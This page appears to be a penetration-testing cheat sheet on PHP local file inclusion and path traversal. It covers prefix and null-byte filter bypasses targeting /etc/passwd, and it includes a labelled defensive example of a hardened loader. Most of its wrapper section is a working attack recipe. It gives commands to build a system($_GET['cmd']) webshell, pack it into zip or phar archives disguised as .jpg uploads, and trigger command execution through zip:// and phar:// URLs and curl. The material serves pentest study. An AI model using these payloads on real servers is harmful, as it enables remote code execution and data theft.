LFI / Path Traversal

A file inclusion vulnerability allows an attacker to make the application include (and, in PHP, execute) a file of their choosing.


Local File Inclusion (LFI) is a vulnerability where an attacker can trick an application into including files from the local server. It happens when user input is used in file paths without proper sanitization, often allowing directory traversal (e.g., ../).

We can bypass filters in various ways:

An app may require the file name to start with a base folder such as /var/www/images. The prefix check passes, but ../ still walks out of that folder: filename=/var/www/images/../../../etc/passwd .

An app may require the filename to end with an expected file extension such as .png. A null byte truncates the path before the appended suffix: filename=../../../etc/passwd%00.png . This only works on PHP older than 5.3.4; later versions refuse paths that contain a null byte in filesystem functions.
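As an added example (not from the original page), here are the two weak checks above written out as PHP, next to a hardened loader that canonicalises the path before comparing it. The directory, the allow-list and the function names are hypothetical, and the code assumes PHP 8:

```php
<?php
// Added example, not from the original page. IMAGE_DIR and the extension
// allow-list are hypothetical values.
const IMAGE_DIR = '/var/www/images';

// Weak check 1: the path must start with the base folder.
// Bypassed by filename=/var/www/images/../../../etc/passwd, because the
// prefix matches and the ".." segments are resolved afterwards.
function load_prefix_check(string $filename): string|false
{
    if (strncmp($filename, IMAGE_DIR . '/', strlen(IMAGE_DIR) + 1) !== 0) {
        return false;
    }
    return file_get_contents($filename);   // the same applies to include()
}

// Weak check 2: the path must end with .png.
// On PHP < 5.3.4, ../../../etc/passwd%00.png passed this test and the
// null byte cut the path at the filesystem call. The suffix test is also
// satisfied by a stream wrapper such as zip://uploads/a.zip%23shell.png,
// and include() executes whatever the inner file contains.
function load_extension_check(string $filename): string|false
{
    if (substr($filename, -4) !== '.png') {
        return false;
    }
    return file_get_contents(IMAGE_DIR . '/' . $filename);
}

// Hardened: resolve first, then compare the canonical path with the
// canonical base directory. realpath() resolves ".." and symlinks, returns
// false for non-existent files, and does not understand zip:// or phar://.
function load_hardened(string $filename): string|false
{
    // Modern PHP refuses null bytes in filesystem functions (PHP 8 throws
    // a ValueError); rejecting them up front avoids the exception path.
    if (str_contains($filename, "\0")) {
        return false;
    }
    $base = realpath(IMAGE_DIR);
    $real = realpath(IMAGE_DIR . '/' . $filename);
    if ($base === false || $real === false) {
        return false;
    }
    // Compare with the trailing separator so /var/www/images2 does not match.
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;
    }
    // Allow-list the extension on the resolved path, not on the user input.
    if (!in_array(pathinfo($real, PATHINFO_EXTENSION), ['png', 'jpg'], true)) {
        return false;
    }
    return file_get_contents($real);
}
```

With this loader, `../../../etc/passwd` resolves to `/etc/passwd`, which fails the prefix comparison, and any wrapper-prefixed value fails because `realpath()` returns false for it. The price is that the file must exist on disk before the check runs, which is the behaviour you want for an image loader anyway.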

PHP wrappers

It is possible to use a .zip archive and/or the phar:// wrapper (phar:// also reads zip and tar archives). Create a .php file with the payload and zip it, then include it; the part after the archive name is the path of the file inside the archive: /?page=phar://uploads/payload.zip/payload&cmd=id

When file upload is possible, place a webshell in a zip archive and include it through the zip:// wrapper. The archive and the file inside it are separated by # (URL-encoded as %23), and the uploaded archive can carry any extension, since the wrapper opens it by content.

```shell
# Create payload (single quotes so the shell does not expand $_GET)
echo '<?php system($_GET["cmd"]); ?>' > payload.php
# Zip payload.php into payload.zip
zip payload.zip payload.php

# Execute commands: archive and inner file are separated by # (%23 in a URL)
/?page=zip://uploads/payload.zip%23payload.php&cmd=id
# If the app appends .php to the parameter itself, omit the extension in the URL
/?page=zip://uploads/payload.zip%23payload&cmd=id
```

Using the phar wrapper

```php
<?php
// Build shell.phar containing shell.txt (the webshell) and a minimal stub.
// Writing a phar requires phar.readonly=0 (see the command below).
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();
```

Compile the script into a .phar file and rename it so it passes an extension check on upload (the phar:// wrapper identifies the archive by content, not by extension):

```shell
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
```

Trigger the file ($URL is the target base URL):

```shell
curl --user-agent "PENTEST" "$URL/?parameter=phar://./shell.jpg%2Fshell.txt&cmd=id"
```

It is also possible to chain wrappers. For more wrappers, see:

https://www.thehacker.recipes/web/inputs/file-inclusion/lfi-to-rce/php-wrappers-and-streams